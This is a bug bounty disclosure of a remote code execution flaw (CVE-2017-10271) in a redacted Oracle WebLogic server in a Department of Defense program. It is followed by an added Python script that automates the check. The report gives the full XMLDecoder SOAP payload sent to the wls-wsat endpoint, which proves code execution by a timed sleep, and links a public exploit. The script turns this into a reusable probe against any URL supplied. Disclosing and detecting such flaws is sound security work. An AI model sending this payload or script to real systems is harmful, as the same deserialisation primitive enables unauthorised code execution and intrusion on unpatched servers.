RCE on █████ via CVE-2017-10271
This issue took 3 Days and 18 hours to triage and 22 Days and 0 hours to resolve once triaged.
Discovered by erbbysam on Deptofdefense
Summary: Happy Friday! The server at ██████ is vulnerable to CVE-2017-10271 "Oracle WebLogic Server Remote Command Execution".
Description: The following request takes 12 seconds (12000 milliseconds) to complete:

```http
POST /wls-wsat/RegistrationPortTypeRPC HTTP/1.1
Host: ██████████
Content-Length: 423
content-type: text/xml
Accept-Encoding: gzip, deflate, compress
Accept: */*

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java class="java.beans.XMLDecoder">
        <object class="java.lang.Thread" method="sleep">
          <long>12000</long>
        </object>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
```
This proves that I have Java code execution on the remote server.
Public exploits for this exist: https://github.com/c0mmand3rOpSec/CVE-2017-10271. I was not able to use that script with a ping command, which might have been blocked by preventing outbound connections.
Suggested Mitigation/Remediation Actions
Patch & possibly don't allow external access.
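The time-based check the report relies on (XMLDecoder in the WorkContext header calling Thread.sleep) can be scripted so it is repeatable and compares against a baseline instead of a single timing. The following is an added example, not the reporter's code or the linked exploit; it assumes the standard /wls-wsat/RegistrationPortTypeRPC path, that a non-2xx response (WebLogic usually answers with a SOAP fault) still arrives only after the sleep has run, and a one-second tolerance that is an arbitrary choice for noisy networks.

```python
"""Time-based probe for CVE-2017-10271 (WebLogic wls-wsat XMLDecoder), added example."""
import time
import urllib.error
import urllib.request

# Assumed: the WS-AT endpoint the report hit; other wls-wsat endpoints also parse WorkContext.
DEFAULT_PATH = "/wls-wsat/RegistrationPortTypeRPC"


def build_probe(delay_ms: int) -> bytes:
    """Return a SOAP envelope whose WorkContext header makes XMLDecoder call Thread.sleep(delay_ms)."""
    envelope = (
        '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
        "<soapenv:Header>"
        '<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">'
        '<java class="java.beans.XMLDecoder">'
        '<object class="java.lang.Thread" method="sleep">'
        f"<long>{int(delay_ms)}</long>"
        "</object></java></work:WorkContext></soapenv:Header>"
        "<soapenv:Body/></soapenv:Envelope>"
    )
    return envelope.encode("utf-8")


def classify(elapsed_ms: float, delay_ms: int, baseline_ms: float, tolerance_ms: float = 1000.0) -> bool:
    """True when the probe took roughly delay_ms longer than the baseline request.

    tolerance_ms (assumed value) absorbs network jitter; a slow server alone should not
    trip this because the baseline is measured with the same endpoint and headers.
    """
    return (elapsed_ms - baseline_ms) >= (delay_ms - tolerance_ms)


def timed_post(url: str, body: bytes, timeout: float) -> float:
    """POST body to url and return elapsed milliseconds, counting HTTP errors as completed requests."""
    req = urllib.request.Request(url, data=body, method="POST")
    req.add_header("Content-Type", "text/xml")
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            resp.read()
    except urllib.error.HTTPError as err:
        # A SOAP fault / 500 is the normal response once the header has been processed.
        err.read()
    return (time.monotonic() - start) * 1000.0


def probe(base_url: str, delay_ms: int = 12000, path: str = DEFAULT_PATH) -> dict:
    """Measure a 0 ms sleep (baseline) and a delay_ms sleep against the same endpoint."""
    url = base_url.rstrip("/") + path
    timeout = delay_ms / 1000.0 + 30.0
    baseline = timed_post(url, build_probe(0), timeout)
    elapsed = timed_post(url, build_probe(delay_ms), timeout)
    return {
        "baseline_ms": baseline,
        "elapsed_ms": elapsed,
        "vulnerable": classify(elapsed, delay_ms, baseline),
    }


if __name__ == "__main__":
    import sys

    target = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:7001"  # placeholder target
    print(probe(target))
```

Run it as `python probe.py http://host:7001` only against systems you are authorised to test; a `vulnerable: True` result with a large gap between baseline_ms and elapsed_ms reproduces the 12-second behaviour in the report without any outbound connection from the target, which is why it works where the ping-based check did not.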